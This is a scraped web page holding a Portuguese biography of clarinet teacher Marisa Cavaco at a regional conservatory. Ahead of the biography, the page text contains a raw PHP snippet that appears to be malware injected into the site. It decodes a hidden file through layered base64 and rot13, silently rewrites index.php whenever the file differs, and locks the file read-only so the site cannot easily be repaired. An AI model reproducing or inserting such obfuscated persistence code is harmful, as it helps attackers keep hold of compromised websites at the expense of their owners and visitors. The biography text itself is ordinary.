$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Marisa Cavaco – Clarinete – Conservatório Regional do Baixo Alentejo

Marisa Cavaco – Clarinete

Nasceu em Beja a 8 de Março de 1990 e iniciou a sua aprendizagem musical aos 10 anos de idade na Escola de Música da Sociedade Musical de Instrução e Recreio Aljustrelense. No ano lectivo 2003/2004, ingressou no Conservatório Regional do Baixo Alentejo, na classe do professor Hernâni Moura, onde terminou o ensino básico no ano letivo 2007/2008. No ano letivo 2008/2009, foi admitida no curso de música, Área Específica de clarinete (ramo de interpretação), na Universidade de Évora, na classe do professor Etienne Lamaison. Terminou a licenciatura no ano lectivo 2010/2011, com 18 valores a clarinete.

No ano letivo 2011/2012 concluiu na Universidade de Évora o 1º ano de Mestrado em Interpretação, variante de clarinete na classe do professor Etienne Lamaison.

No ano letivo 2015/2016 concluiu o Mestrado em Ensino da Música no Instituto Piaget de Almada, com a classificação final de 17 valores.

Participou em vários cursos de aperfeiçoamento para jovens músicos, trabalhou com com Juan Ferrer, Carlos Marques, Myra Melford, Paulo Gaspar, Adelino Mota, Dominique Vidal, Christopher Bochmann, Kodo Yamagishi, entre outros. Tem colaborado com diferentes grupos musicais, tais como: Orquestra da Universidade de Évora, Orquestra de jovens músicos do Inatel, Orquestra de Sopros do Alentejo “Além Tejo música”, Orquestra de Sopros do Algarve, Orquestra Ibérica. Colaborou recentemente na produção de um espetáculo com o grupo “PlINT e Orquestra”, onde ingressou a orquestra.

Lecionou clarinete no Conservatório Regional de Vila Real de Santo António e no Conservatório Regional do Alto Alentejo. Lecionou a disciplina de Música, na Santa Casa da Misericórdia de Aljustrel a crianças entre 1 e 5 anos de idade. Realizou diferentes sessões “Música para bebés” para famílias na Santa Casa da Misericórdia de Aljustrel.

Atualmente, desempenha o cargo de professora de clarinete, no Conservatório Regional do Baixo Alentejo.

Participou na produção de um projeto ”No Mundo do Miró”, música para crianças, apresentado em diferentes salas de espetáculo a nível nacional, tais como: Casa da Música no Porto, Centro Cultural de Belém, entre outras.

Leave a Reply

Your email address will not be published.